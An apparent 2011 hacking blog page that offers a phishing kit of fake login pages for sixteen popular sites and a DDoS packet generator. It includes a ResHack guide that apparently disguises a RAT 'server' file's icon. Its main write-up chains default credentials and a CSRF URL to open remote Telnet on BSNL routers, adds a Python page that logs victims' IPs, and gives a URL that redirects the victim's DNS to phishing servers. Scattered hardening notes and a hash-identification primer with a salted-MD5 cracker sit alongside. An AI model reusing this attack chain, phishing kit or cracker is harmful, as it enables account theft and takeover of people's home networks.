Sunday, April 17, 2011

Social Engineering Ninja - PHP Scripts

S-E Ninja is a social-engineering toolkit written in PHP: fake login pages for 20-25 popular sites (the list below names 16), plus an anonymous mailer built on PHP's mail() function.



Sites included:
amazon.com
digg.com
ebuddy.com
facebook.com
gmail.com
hotmail.com
msn.com (hotmail)
myspace.com
onecard.com (AR,EN Langs)
paypal.com
travian.com (AR,EN Langs)
twitter.com
yahoo.com
youtube.com
xboxlive.com
hotfile.com

Features:
popular phishing pages
IP catcher with redirection
Public browser exploitation
Anonymous email sender

Download Social-Engineering Ninja V0.4 (SEN-V0.4.rar) here

Hyenae - A Platform Independent Network Packet Generator

Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.

Hyenae can be used to reveal potential security weaknesses in your network. Besides smart wildcard-based address randomization, highly customizable packet generation control and an interactive attack assistant, Hyenae comes with a clusterable remote daemon for setting up distributed attack networks.
Security teams use Hyenae to attack their own networks before someone else does. It can be used to evaluate how a new security device reacts to different types of attack, and as a proof of concept against the web applications, network applications, database applications and other custom applications in your environment.
In short, Hyenae can be used to stress-test applications and devices.

Note: this tool might look like just another packet generator, but don't go by looks; it is really powerful and flexible.


Download Hyenae v0.36-1 (hyenae-0.36-1.tar.gz/hyenae-0.36-1_fe_0.1-1-win32.exe) here.

PWNING ROUTERS (BSNL)

Today I'm going to show you how a series of vulnerabilities in a web application can be chained and creatively exploited.
 
Product Description:
 

The product I had my hands on is this UTSTARCOM router (BSNL's page for it, the UT300R2U, is linked below).

It is one of the most common ADSL modem-cum-routers, rolled out by BSNL to its customers a year ago when the number of internet subscribers was peaking. This little device runs a web server that serves the web-based router configuration application, and it also has a Telnet service running.
 
The so-called built-in security features:

* Remote web access to the router is blocked by default [so you can't reach a victim's router from the Internet using their public IP]

* Remote Telnet access is also blocked by default

After a little playing around with the device, I found that there are three different users that can log in to the router:

admin, user and support

The documentation provided by BSNL neither mentions that there are three different accounts that can access the device nor forces/asks/shows the customer to change the default password used to access the router [Note: this is the router login password, not the PPPoE password].

http://www.chennai.bsnl.co.in/BBS/UT300R2U.htm

 
User description:
As the name suggests, the admin user can make every configuration change on the router, whereas the user account is not supposed to be able to change any of the router's configuration.

Logged in as Admin:



Logged in as User:


 
Vulnerability description:

On closer examination of the page source, I got hold of a JavaScript file, menuBCM.js:



menuBCM.js (excerpt):

  function menuAdmin(options) { // All the options are displayed for ADMIN
   var std = options[MENU_OPTION_STANDARD];
   var proto = options[MENU_OPTION_PROTOCOL];
   var firewall = options[MENU_OPTION_FIREWALL];
   var nat = options[MENU_OPTION_NAT];
   var ipExt = options[MENU_OPTION_IP_EXTENSION];
   var wireless = options[MENU_OPTION_WIRELESS];
   var voice = options[MENU_OPTION_VOICE];
   var snmp = options[MENU_OPTION_SNMP];
   var ddnsd = options[MENU_OPTION_DDNSD];
   var sntp = options[MENU_OPTION_SNTP];
   // ... rest of menuAdmin(), plus menuSupport() and menuUser(), omitted ...

   // this piece of code picks which menu is displayed, based only on the user name
   if ( user == 'admin' )
      menuAdmin(options);
   else if ( user == 'support' )
      menuSupport(options);
   else if ( user == 'user' )
      menuUser();
}

-------------code truncated
So it is pretty obvious from the code that user privilege management is handled by this JavaScript: every menu is rendered for admin, and the configuration menus are merely hidden from user. Nothing on the server side enforces the difference.

So a user-level login can still reach the configuration pages simply by knowing their URLs.


The default username:password combinations are

admin:admin
user:user

Since user privilege management is handled by JavaScript in the web UI, it plays no part in a Telnet session: whether we telnet in as admin or as user, we get full privileges on the router.


Adding fuel to the fire, the web-based configuration application is vulnerable to CSRF: configuration changes are made by plain GET requests carrying no anti-forgery token, so any web page the victim opens can trigger them from inside the LAN.
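To make the two defects concrete, here is an added example (my own code, not the router's firmware or anything from the original post) that models the router's design in Python: a request handler that authenticates but, like menuBCM.js, leaves role enforcement to the browser and accepts configuration changes over GET, next to a hardened handler that checks the role on the server, accepts changes only via POST and requires a per-session anti-CSRF token. The scsrvcntr.cmd endpoint, the query string and the default credentials are taken from the post; the Router class, the status codes and the token handling are assumptions for illustration.

```python
# Added example: a constructed Python model of the router's web app, not the
# real firmware. Endpoint, query string and default credentials are from the
# post; the Router class, status codes and token scheme are assumptions.
import hmac
import secrets
from urllib.parse import parse_qs

# Default web credentials as listed in the post.
DEFAULT_USERS = {"admin": "admin", "user": "user"}
# Accounts allowed to change configuration (per the post: only admin).
ADMIN_ROLES = {"admin"}

# The request from the post, minus the user:user@ prefix (that is HTTP
# basic auth, passed separately below).
CSRF_QUERY = ("action=save&http=1&http=3&icmp=1&snmp=1&snmp=3"
              "&telnet=1&telnet=3&tftp=2&tftp=0")


class Router:
    """Minimal stand-in for the router's configuration store."""

    def __init__(self):
        self.users = dict(DEFAULT_USERS)
        self.services = {}      # last saved service-control settings (raw params)
        self.csrf_tokens = {}   # session id -> token (hardened design only)


def authenticate(router, user, password):
    stored = router.users.get(user)
    return stored is not None and hmac.compare_digest(stored, password)


# --- Design 1: what menuBCM.js implies --------------------------------------
# The account name decides only which menu the browser renders. The server
# runs the .cmd handler for any authenticated account and accepts the change
# on a GET, so a user:user login and a cross-site <img> both succeed.
def vulnerable_handle(router, method, path, query, user, password):
    if not authenticate(router, user, password):
        return 401
    if path == "/scsrvcntr.cmd":
        router.services = parse_qs(query)   # no role check, no CSRF check
        return 200
    return 404


# --- Design 2: the checks the server has to make itself ----------------------
def issue_csrf_token(router, session_id):
    """Token handed to the admin's page; a forged request cannot know it."""
    token = secrets.token_hex(16)
    router.csrf_tokens[session_id] = token
    return token


def hardened_handle(router, method, path, query, user, password,
                    session_id=None, csrf_token=None):
    if not authenticate(router, user, password):
        return 401
    if path == "/scsrvcntr.cmd":
        if user not in ADMIN_ROLES:       # role enforced on the server
            return 403
        if method != "POST":              # state changes never on GET
            return 405
        expected = router.csrf_tokens.get(session_id)
        if expected is None or csrf_token is None \
                or not hmac.compare_digest(expected, csrf_token):
            return 403                    # an <img> or auto-submitted form has no token
        router.services = parse_qs(query)
        return 200
    return 404


def demo():
    """Replays the post's request against both designs."""
    weak = Router()
    as_user = vulnerable_handle(weak, "GET", "/scsrvcntr.cmd", CSRF_QUERY, "user", "user")
    strong = Router()
    blocked = hardened_handle(strong, "GET", "/scsrvcntr.cmd", CSRF_QUERY, "user", "user")
    token = issue_csrf_token(strong, "sess-1")
    allowed = hardened_handle(strong, "POST", "/scsrvcntr.cmd", CSRF_QUERY,
                              "admin", "admin", "sess-1", token)
    return as_user, blocked, allowed


if __name__ == "__main__":
    print(demo())   # (200, 403, 200)
```

The point of the side-by-side is that hiding menus in JavaScript is presentation, not authorization: the vulnerable handler lets the user:user account save service settings, and because it does so on a GET, a page anywhere on the web can make the victim's browser send that request. The hardened handler fails the same request three separate ways (wrong role, wrong method, missing token), which is the defence in depth a device exposing a configuration interface on the LAN needs.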

 
Exploitation:

First and foremost, we can't reach the victim's router from the WAN, so the victim's own browser has to make the request for us.

Because the router has no CSRF protection, this URL does the job:

http://user:user@192.168.1.1/scsrvcntr.cmd?
action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0

Since user:user is something of a hidden/undisclosed account, the chance of its default password having been changed is very small.

We can send this link to a victim by email or through other social-engineering techniques. When it is opened from inside the victim's LAN it changes the router configuration to allow remote web access and remote Telnet access to the router.


The entire exploit consists of two pages:

1) index.html

2) config.html

Once the victim visits this page, we have their public IP in our database or wherever the IP-logger script stores it.
Now we can log in to their router either over Telnet or through the web application.
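As an added example of the two-page delivery described above (constructed here, not the author's index.html/config.html, which the post shows only as screenshots), the following Python script serves index.html, which records the visitor's address and redirects, and config.html, which carries the CSRF GET as a hidden image. The router address and the scsrvcntr.cmd URL are the ones in the post; the port, the page markup and the in-memory visitor log are assumptions.

```python
# Added example: a constructed stand-in for the post's index.html/config.html
# and IP logger, not the author's files. Router address and CSRF URL are from
# the post; port, page markup and the in-memory log are assumptions.
import html
import http.server
import socketserver
from datetime import datetime, timezone

ROUTER_IP = "192.168.1.1"
CSRF_URL = ("http://user:user@" + ROUTER_IP + "/scsrvcntr.cmd?"
            "action=save&http=1&http=3&icmp=1&snmp=1&snmp=3"
            "&telnet=1&telnet=3&tftp=2&tftp=0")
LISTEN_PORT = 8080

VISITORS = []   # (utc timestamp, ip); a real logger would write to a file or DB


def log_visitor(ip, when=None):
    """Records the visitor's address; returns the number of entries so far."""
    when = when or datetime.now(timezone.utc)
    VISITORS.append((when.isoformat(), ip))
    return len(VISITORS)


def index_page(next_page="config.html"):
    """Landing page: the server logs the visitor, the page sends them on."""
    return ("<!doctype html><html><head>"
            '<meta http-equiv="refresh" content="0; url=%s">' % html.escape(next_page)
            + "</head><body>Loading...</body></html>")


def config_page(csrf_url=CSRF_URL):
    """CSRF page: a 1x1 <img> whose src is the config-changing GET. The
    victim's browser issues it from inside the LAN, so the router's "no WAN
    access" rule is irrelevant; the user:user@ prefix carries the default
    credentials (see the note after this block about current browsers)."""
    return ("<!doctype html><html><body>"
            '<img src="%s" width="1" height="1" alt="">' % html.escape(csrf_url, quote=True)
            + "</body></html>")


class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path in ("/", "/index.html"):
            log_visitor(self.client_address[0])
            body = index_page()
        elif self.path == "/config.html":
            body = config_page()
        else:
            self.send_error(404)
            return
        data = body.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    with socketserver.TCPServer(("0.0.0.0", LISTEN_PORT), Handler) as srv:
        srv.serve_forever()
```

Two caveats for anyone reproducing this in a lab. The logged address is the victim's public IP only when they reach the page directly rather than through a proxy. And current browsers generally refuse to send credentials embedded in subresource URLs such as user:user@... (Chrome has blocked them since version 59), so the image request reaches the router without an Authorization header unless the victim's browser already holds a basic-auth session with it; the 2011-era browser behaviour the post relies on is exactly why a router must never let a bare GET change its service configuration.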

Even if the victim has changed the admin password for the device, we can log in as user:user, navigate to the password.html page and view the source: kaboom, plain-text passwords in the page's JavaScript.


passwords.html


So now we have admin access to both the Telnet service and the web service, and a variety of further attacks become possible.


Possible attacks:

1. Denial of service:

   1. The attacker can enable MAC filtering or other IP restrictions on the victim's router.
   2. Specify an unreachable static route.
   3. Repeatedly kill the router's httpd process over Telnet.
 

2. Sniffing:

   1. The attacker can set a static route on the victim's router that passes through their own network and sniff the victim's traffic [SSLstrip + Ettercap + Wireshark].



3. Phishing:

This is the attack of special interest to us, as it is one of the stealthiest when combined with routing attacks.

The attacker can set a fake DNS server on the victim's router and then carry out phishing attacks.

http://192.168.1.1/dnscfg.cgi?dnsPrimary=XX.XX.XX.XX&dnsSecondary=XX.XX.XX.XX&dnsDynamic=0&dnsRefresh=1
XX.XX.XX.XX = attacker's DNS server

With the admin access obtained above, this request changes the primary and secondary DNS servers of the victim's router.

Now the victim's network looks like this:

So in our DNS server we can publish our phishing site's IP address as the A record for well-known sites (facebook, orkut, banking sites, etc.), and every lookup from the victim's LAN resolves to us.





Greets to:
Author: Boris

ASIA runs out of IPv4 Address

The Asia Pacific Network Information Centre (APNIC) has run out of all but a handful of IPv4 addresses that it is holding in reserve for start-up network operators.
APNIC is the first of the Internet's five regional Internet registries to deplete its free pool of IPv4 address space.
APNIC's news is another sign that CIOs and other IT executives need to begin migrating to IPv6, the long-anticipated upgrade to the Internet's main communications protocol known as IPv4.

"For anybody who hasn't figured out that it's time to do IPv6, this is another wake-up call for them," says Owen DeLong, an IPv6 evangelist at Hurricane Electric and a member of the advisory council of the American Registry for Internet Numbers (ARIN), the North American counterpart to APNIC.
Any CIO who isn't planning for IPv6 is "driving toward a brick wall and closing your eyes and hoping that it's going to disappear before you get there," DeLong says. Ignoring IPv6 "is not the best strategy."
Most IPv4 address space is expected to be handed out by the regional Internet registries by the end of 2011.
IPv4 uses 32-bit addresses and can support 4.3 billion devices connected directly to the Internet. IPv6, on the other hand, uses 128-bit addresses and supports a virtually unlimited number of devices -- 2 to the 128th power.
The Asia Pacific region has been gobbling up the most IPv4 address space in recent years. Geoff Huston, Chief Scientist at APNIC, said APNIC allocated more than 58 million IPv4 addresses in the last two months alone: 41.2 million in March and 16.8 million in April. Among the largest allocations since February 1 were 8.3 million to NTT Communications of Japan, 4.1 million addresses to China Mobile, 4.1 million addresses to KDDI of Japan, and 3.1 million to North Star Information of China. Three other carriers -- India's Bharti Airtel Ltd., Pakistan Telecommunications and Chinanet Hunan Province Network -- all received 2 million IPv4 addresses.
APNIC has depleted its IPv4 address space "dramatically faster than people expected," DeLong says. "My guess is that a lot of operators in the Asia Pacific region realized the time of IPv4 depletion was drawing near and they rushed to get their applications in."


APNIC is holding 16.7 million IPv4 addresses -- dubbed a /8 in network engineering terms -- in reserve to distribute in tiny allotments of around 1,000 addresses each to new and emerging IPv6-based networks so they can continue to communicate with the largely IPv4-based Internet infrastructure.
ARIN, which doles out IPv4 and IPv6 address space to companies operating in North America, predicts that it will run out of IPv4 addresses this fall.
"RIPE [the European Internet registry] is going to be the next one to run out. I wouldn't count on them making it until July," DeLong says. "I think ARIN will make it to the end of this year; maybe we'll run out in October or November."

A Brief Intro to Hashes & Salts




 What Is a Hash?


Ok, firstly, a lot of you still believe that hashes can be "decrypted". This is a common misconception: hashes are produced by one-way cryptographic hash functions, which means the algorithm that created them cannot be run backwards to recover the plaintext password.

These one-way functions are used so that systems never have to store passwords in plain text. When a password is entered (for example at a login screen), the hash function is applied to the supplied password and the output is compared with the hash stored for that user. If the two hashes match, the passwords are the same and the user is authenticated; if they differ, the passwords do not match and access is denied.

Types Of Hashes And How To Identify Them

MD5 - The most common hash you will come across in the wild is an MD5 hash (Message-Digest algorithm 5).

These hashes are easily identified by the following factors:
- They are always 32 characters in length (128 bits)
- They are always hexadecimal (only the characters 0-9 and A-F, in either case)

Example - f5d1278e8109edd94e1e4197e04873b9

If the hash breaks one of these rules - IT IS NOT MD5. (The reverse does not hold: any other 128-bit digest, such as MD4 or NTLM, looks exactly the same, so these rules only rule formats out.)

SHA1 - Still used frequently on the internet, and one of a large family of Secure Hash Algorithms.

These hashes are easily identified by the following factors:
- They are always 40 characters in length (160 bits)
- They are always hexadecimal (only the characters 0-9 and A-F, in either case)

Example - ab4d8d2a5f480a137067da17100271cd176607a1

If the hash breaks one of these rules - IT IS NOT SHA1. (Other 160-bit digests such as RIPEMD-160 look identical, so again this is a rule-out test.)

MySQL < 4.1 - These aren't used very often but still come up regularly, because people have no idea what to do with them. They are produced by the PASSWORD() function of older MySQL versions (OLD_PASSWORD() in later ones).

These hashes are easily identified by the following factors:
- They are always 16 characters in length (64 bits)
- They are always hexadecimal (only use characters 0-9 and A-F)

If the hash breaks one of these rules - IT IS NOT MYSQL < 4.1.

Example - 606727496645bcba

MYSQL5 - Used by MySQL 4.1 and later to store database user passwords; the value is an asterisk followed by SHA1(SHA1(password)) in uppercase hex.

These hashes are easily identified by the following factors:
- They are always 41 characters in length
- They are always capitalized
- They always begin with an asterisk

If the hash breaks one of these rules - IT IS NOT MYSQL5.

Example - *C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75

MD5(Wordpress) - Used by WordPress-driven sites, and one of the hashes most commonly confused by everyone. It is the phpass "portable" hash, a salted and iterated MD5: after $P$ come one character encoding the iteration count, an 8-character salt and a 22-character encoded digest.

These hashes are easily identified by the following factors:
- They always start with $P$
- The rest is mixed-case alphanumeric (0-9 A-Z a-z); phpass's alphabet also includes . and /, so those can appear
- They are always 34 characters long

If the hash breaks one of these rules - IT IS NOT MD5(Wordpress).

Example - $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1

MD5(phpBB3) - Used by phpBB3 forums; the same phpass format with a different prefix, and another commonly misidentified hash, especially among skids.

These hashes are easily identified by the following factors:
- They always start with $H$
- The rest is mixed-case alphanumeric (0-9 A-Z a-z), plus . and / as above
- They are always 34 characters long

If the hash breaks one of these rules - IT IS NOT MD5(phpBB3).

Example - $H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0
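The identification rules above can be written down as a small Python checker. This is an added example (not part of the original post): it turns each rule into an anchored regular expression and reports every format a string is consistent with, which is the honest answer, since length and character set can only rule formats out. The sample hashes are the ones from the post; the alphabets for the $P$/$H$ formats follow phpass itself, which also allows . and /.

```python
# Added example: the post's identification rules as anchored regexes.
# Sample hashes are copied from the post. Not part of the original.
import re

# Length and character set only ever rule a format OUT: a 32-hex string is
# consistent with MD5 but equally with MD4 or NTLM, so identify() returns
# every candidate rather than a single verdict.
RULES = [
    ("MD5", re.compile(r"^[0-9a-fA-F]{32}$")),
    ("SHA1", re.compile(r"^[0-9a-fA-F]{40}$")),
    ("MySQL<4.1", re.compile(r"^[0-9a-fA-F]{16}$")),
    # MySQL 4.1+: '*' followed by 40 uppercase hex digits.
    ("MySQL5", re.compile(r"^\*[0-9A-F]{40}$")),
    # phpass (WordPress $P$, phpBB3 $H$): prefix + 1 iteration-count char
    # + 8-char salt + 22-char digest, all from the alphabet ./0-9A-Za-z.
    ("MD5(WordPress)", re.compile(r"^\$P\$[./0-9A-Za-z]{31}$")),
    ("MD5(phpBB3)", re.compile(r"^\$H\$[./0-9A-Za-z]{31}$")),
    # hash:salt; the salt may be any length and occasionally holds symbols.
    ("Salted MD5", re.compile(r"^[0-9a-fA-F]{32}:.+$")),
]


def identify(candidate):
    """Returns the names of every rule the string satisfies."""
    s = candidate.strip()
    return [name for name, rx in RULES if rx.match(s)]


# Examples from the post, keyed by the format they are given as.
SAMPLES = {
    "MD5": "f5d1278e8109edd94e1e4197e04873b9",
    "SHA1": "ab4d8d2a5f480a137067da17100271cd176607a1",
    "MySQL<4.1": "606727496645bcba",
    "MySQL5": "*C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75",
    "MD5(WordPress)": "$P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1",
    "MD5(phpBB3)": "$H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0",
    "Salted MD5": "49adee90123f8c77d9020bba968c34dd:PS2en",
}


def check_samples():
    """True when every sample is matched by its own rule and no other."""
    return all(identify(value) == [name] for name, value in SAMPLES.items())


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print("%-15s %-45s -> %s" % (name, value, identify(value)))
    print("all samples classified as labelled:", check_samples())
```

Because the MySQL5 rule insists on uppercase, a lowercased copy of that example matches nothing; that is the rule working as intended, but it is also a reminder that a dump which has been lowercased by some intermediate tool will defeat format guessing by regex alone.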


SALTS:-

Ok, now there is a LOT of confusion around salts, so I'm going to try to clear this up quickly. The most commonly salted hash is MD5, because it is fast to compute and therefore cheap to crack. A salt is a random value combined with the password before hashing, for example MD5($password.$salt). The salt does not make a single guess any slower; what it does is make every user's hash unique, so that precomputed tables and online lookup services no longer apply and each salted hash has to be attacked on its own.

Salted MD5 - Used in a large number of applications to make hashes unique and to increase the total time it takes to crack a dump.

These hashes are easily identified by the following factors:
- They consist of two blocks separated by a colon; the first is the hash, the second is the salt.
- The first part is hexadecimal, the second is mixed-case alphanumeric.
- The first part is always 32 characters long.
- The second part can be any length.

If the hash breaks one of these rules - IT IS NOT A SALTED MD5.

Example - 49adee90123f8c77d9020bba968c34dd:PS2en

Warning - in some cases the salt can contain symbols (but this is rare).

NOTE - You need both the salt AND the hash to crack a salted MD5, and you also need to know how the application combined them: MD5($password.$salt) and MD5($salt.$password) give different results for the same inputs.


How To Crack Hashes


MD5 - MD5 hashes are easily broken today thanks to the many online MD5 lookup services such as www.hashchecker.de, which search databases of precomputed hashes (exactly what salting defeats).
If you can't crack your hash online, you will need a tool such as John the Ripper, or a more advanced hash cracker
such as Password Pro or HashCat.
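As an added example for the salt discussion above and for cracking in general (constructed for this page, not the author's code and not a substitute for John or hashcat), the following Python script parses the hash:salt format, tries the common ways applications combine password and salt, and runs a small dictionary attack. The wordlist and the target hashes are constructed inline so the script runs offline; real wordlists and real dumps are the obvious substitution.

```python
# Added example for the salt discussion: parses hash:salt, tries the common
# password/salt combinations and runs a small dictionary attack. Wordlist and
# targets are constructed inline; nothing here is the original post's code.
import hashlib
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


# How applications typically combine password and salt. The dump alone does
# not tell you which one was used, so a cracker tries each in turn.
COMBINATIONS = {
    "md5($pass.$salt)": lambda p, s: md5_hex(p + s),
    "md5($salt.$pass)": lambda p, s: md5_hex(s + p),
    "md5(md5($pass).$salt)": lambda p, s: md5_hex(md5_hex(p).encode() + s),
}


def parse_salted(entry):
    """Splits 'hash:salt' from the post's format; the salt may itself contain ':'."""
    hash_part, sep, salt = entry.partition(":")
    if not sep or not HEX32.match(hash_part) or not salt:
        raise ValueError("not a salted MD5 entry: %r" % entry)
    return hash_part.lower(), salt


def make_entry(password, salt, combination="md5($pass.$salt)"):
    """Builds a hash:salt entry the way an application would store it."""
    digest = COMBINATIONS[combination](password.encode(), salt.encode())
    return digest + ":" + salt


def crack(entry, wordlist):
    """Returns (password, combination) on success, None if the list is exhausted."""
    target, salt = parse_salted(entry)
    salt_b = salt.encode()
    for word in wordlist:
        word_b = word.encode()
        for name, combine in COMBINATIONS.items():
            if combine(word_b, salt_b) == target:
                return word, name
    return None


# Constructed wordlist; a real attack uses a large list such as rockyou.
WORDLIST = ["123456", "password", "letmein", "qwerty", "ninja2011"]

# Constructed targets. Same password with a different salt, or a different
# combination order, gives a different hash: that is the point of salting.
TARGETS = [
    make_entry("letmein", "PS2en"),
    make_entry("letmein", "x9Qe"),
    make_entry("qwerty", "PS2en", "md5($salt.$pass)"),
    make_entry("correcthorse", "PS2en"),   # not in the list: stays uncracked
]


def crack_all(entries=TARGETS, wordlist=WORDLIST):
    return {e: crack(e, wordlist) for e in entries}


if __name__ == "__main__":
    for entry, result in crack_all().items():
        print(entry, "->", result)
```

Note what the salt buys the defender here: the two letmein entries share a password yet have to be attacked separately, and nothing precomputed for one helps with the other. What it does not buy is per-guess cost; each candidate still costs one MD5, which is why modern password storage uses a slow, iterated construction (bcrypt, scrypt, PBKDF2, or the phpass scheme WordPress uses) rather than a single salted MD5.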

Mantra - A Web Based Security Framework



Mantra is a dream that came true for the author. It is a collection of free and open-source tools integrated into a web browser, Firefox, which can come in handy for students, penetration testers, web application developers, security professionals, etc. It is portable, ready to run, compact and follows the true spirit of free and open-source software. Mantra is a security framework that can help in all the phases of an attack: reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted at web developers and code debuggers, which makes it handy for both offensive and defensive security tasks.





This is the list of tools included:

  • Access Me
  • Add N Edit Cookies+
  • CookieSwap
  • Domain Details
  • FireFTP
  • FireFlash
  • Firebug
  • Firebug Autocompleter
  • Firecookie
  • Firesheep
  • FormBug
  • FoxyProxy
  • FoxySpider
  • Google Site Indexer
  • Greasemonkey
  • Groundspeed
  • HackBar
  • Host Spy
  • HttpFox
  • JSview
  • JavaScript Deobfuscator
  • Key Manager
  • Library Detector
  • Live HTTP Headers
  • PassiveRecon
  • Poster
  • RESTClient
  • RESTTest
  • RefControl
  • Resurrect Pages
  • SQL Inject ME
  • Selenium IDE
  • Tamper Data
  • URL Flipper
  • User Agent Switcher
  • Vitzo WHOIS
  • Wappalyzer
  • Web Developer
  • XSS Me
  • refspoof
Download Mantra Pre-Alpha 0.01 here

Wednesday, April 13, 2011

Change Your Server File Icon

Change your server's icon with ResHack

I decided to write a quick little guide for ResHack.

1. Start by downloading ResHack from here: Download ResHack

2. After downloading, extract and install it; I won't go in depth on that, since I guess you all know how to do it.

3. After installing, run ResHack as administrator.

4. Now go to File > Open, or press Ctrl+O.
Look at the picture below.



5. Now choose your server file, select it and press Open.


6. It should now look like the picture below. If not, redo steps 4 and 5.


7. Go to Action > Replace Icon.

8. Press "Open file with new icon...", browse to the icon you want on the server, choose it and press "Replace".

9. ResHack should now look like the picture below if you did everything correctly.

10. Go to File > Save.




And now you are done:
your server should have its icon changed.

If you feel anything needs to be changed or explained better in this thread, please let me know so I can change it :)




Sunday, April 10, 2011

Web Snake

WebSnake searches for and retrieves files from the Internet, pulling files, HTML, images and data directly from the web.

WebSnake supports website mirroring (including directory structure), retrieval of e-mail addresses, site maps and advanced file search. Unlike most of its competitors, WebSnake also supports the industry-standard File Transfer Protocol (FTP).

Download

MBSA (Microsoft Baseline Security Analyzer)

Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small- and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Improve your security management process by using MBSA to detect common security misconfigurations and missing security updates on your computer systems.








Download

What You Must Know

MBSA requires the following software to be installed:
  • Windows 2000 SP3 or later, Windows XP (local scans only on computers running Windows XP that use simple file sharing), Windows Server 2003, Windows Vista, or Windows Server 2008
  • The latest Windows Update Agent (WUA) client; MBSA automatically updates computers that need an updated WUA client if the option Configure computers for Microsoft Update and scanning prerequisites is selected.
  • IIS 5.0, 5.1 or 6.0 (required for IIS vulnerability checks)
  • SQL Server 2000 or MSDE 2.0 (required for SQL vulnerability checks)
  • Microsoft Office 2000, Office XP, or Office 2003 (required for Office vulnerability checks)
  • The following services must be installed or enabled: Server service, Workstation service, Remote Registry service, File & Print Sharing, and the DCOM updates and firewall exceptions (required for security update checks)